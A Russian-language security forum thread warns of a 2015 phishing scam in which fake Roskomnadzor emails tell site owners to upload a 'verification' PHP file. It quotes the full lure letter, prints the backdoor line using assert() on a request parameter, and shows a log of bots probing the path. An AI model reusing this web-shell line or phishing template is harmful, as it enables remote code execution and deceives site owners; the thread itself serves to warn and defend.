1. Администрация SafeZone приветствует вас на нашем форуме!
    Если вы больше не желаете видеть рекламу при просмотре тем и сообщений - то достаточно просто зарегистрироваться. Для зарегистрированных пользователей реклама не отображается.
    Если у вас возникли проблемы с регистрацией на форуме - то вы можете сообщить об этом с помощью этой формы без авторизации,администрация форума обязательно отреагирует на вашу проблему.
    Скрыть объявление

Творческая попытка взлома сайта: пишут от имени Роскомнадзора

Тема в разделе "Мошенники и мошенничество", создана пользователем лис.хвост, 27 авг 2015.

  1. лис.хвост

    лис.хвост VIP Разработчик

    Сообщения:
    661
    Симпатии:
    1.031
    Пост-предостережение, так как развод очень необычный и создан на волне блокировок Роскомнадзором.

    Я думаю, что многие слышали, что Роскомнадзор в последнее время набрал много сотрудников, которые ищут в интернете запрещенную информацию и блокируют страницы в интернете. Параллельно с этим Роскомнадзор формирует «реестр организаторов распространения информации» (закон о блогерах). О внесении Хабра в этот список было объявлено 25 сентября 2014 года.

    [​IMG]

    В любом случае Роскомнадзор заработал себе не очень хорошую репутацию и уверен, что владельцы сайтов бояться попасть в какой-нибудь список этой организации.

    Сегодня моя хорошая знакомая прислала мне письмо в котором было написано, что её сайт с относительно небольшой посещаемостью внесен в этот реестр.
    www.yandex.ru в сети «Интернет».

    В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон „Об информации, информационных технологиях и о защите информации“ и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайтwww.yandex.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

    Для идентификации Вас, как администратора доменного имени www.yandex.ru, Вам необходимо:

    1. Cоздать в корневой директории Вашего сайта папку reestr
    2. Cоздать в данной папке файл reestr-id198617.php, содержащий следующий текст:

    PHP:
    <php
    /*Подтверждение доменного имени www.yandex.ru*/
    assert(stripslashes($_REQUEST[roskomnadzor]));
    >
    *В < ?php необходимо убрать пробел между < и ?php
    Путь до файла на Вашем сайте должен получиться следующий: www.yandex.ru/reestr/reestr-id128032.php

    Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имениwww.yandex.ru, следую инструкции указанной выше, то Ваш сайт www.yandex.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

    — С уважением,
    ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

    Уверен, что многим стало ясно, что это развод, однако мошенники сделали все, чтобы не сильно продвинутые пользователи выполнили действия по инструкции: письмо пришло с адреса zapret-info@roskomnadzor.org, поэтому неграмотный пользователь может подумать, что ему действительно написали из этой организации. При переходе на адрес roskomnadzor.org пользователя перекидывает на rkn.gov.ru что создает иллюзию реального сайта и домена. Домен roskomnadzor.org был зарегистрирован 6 дней назад.

    [​IMG]

    Много действий от пользователя не нужно: создайте директорию, файл, напишите в этом файле одну строку.

    Развод заключается в том, что пользователю предлагают создать файл с на первый взгляд безобидным php кодом. Однако, если посмотреть описание функции assert, то сразу станет ясно, что злоумышленники просто выполнят код, который будет указан в переменной roskomnadzor.

    Источник: Необычный развод под видом Роскомнадзора
     
    Последнее редактирование модератором: 27 авг 2015
    Охотник, orderman, Phoenix и 6 другим нравится это.
  2. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.624
    Симпатии:
    14.716
    [​IMG]
     
    Последнее редактирование: 27 авг 2015
    Охотник, orderman, Phoenix и 4 другим нравится это.
  3. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.624
    Симпатии:
    14.716
    Боты такие боты и к нам добрались
    PHP:
    Line 102903: 77.222.57.53 - - [27/Aug/2015:10:31:30 +0300] "GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.0" 404 26079 "-" "-"
     
    orderman, Phoenix, shestale и 2 другим нравится это.
  4. Phoenix

    Phoenix Активный пользователь

    Сообщения:
    2.038
    Симпатии:
    2.016
  5. Охотник

    Охотник Активный пользователь

    Сообщения:
    281
    Симпатии:
    344
    А написано так строго
    что не зная - реально засочкуешь.
     
    SNS-amigo нравится это.
  6. aa_rudenko

    aa_rudenko Новый пользователь

    Сообщения:
    3
    Симпатии:
    2
    Да при чём тут первый ФЗ о внесении изменений во второй ФЗ + решение суда (какового, возможно, и не было вовсе на свете);
    "в течении суток" + "Если в течении 72 часов" + "следую" = явные мошенники! Сами так и пишут...
     
Загрузка...
Похожие темы - Творческая попытка взлома
  1. Кирилл
    Ответов:
    24
    Просмотров:
    8.515

Поделиться этой страницей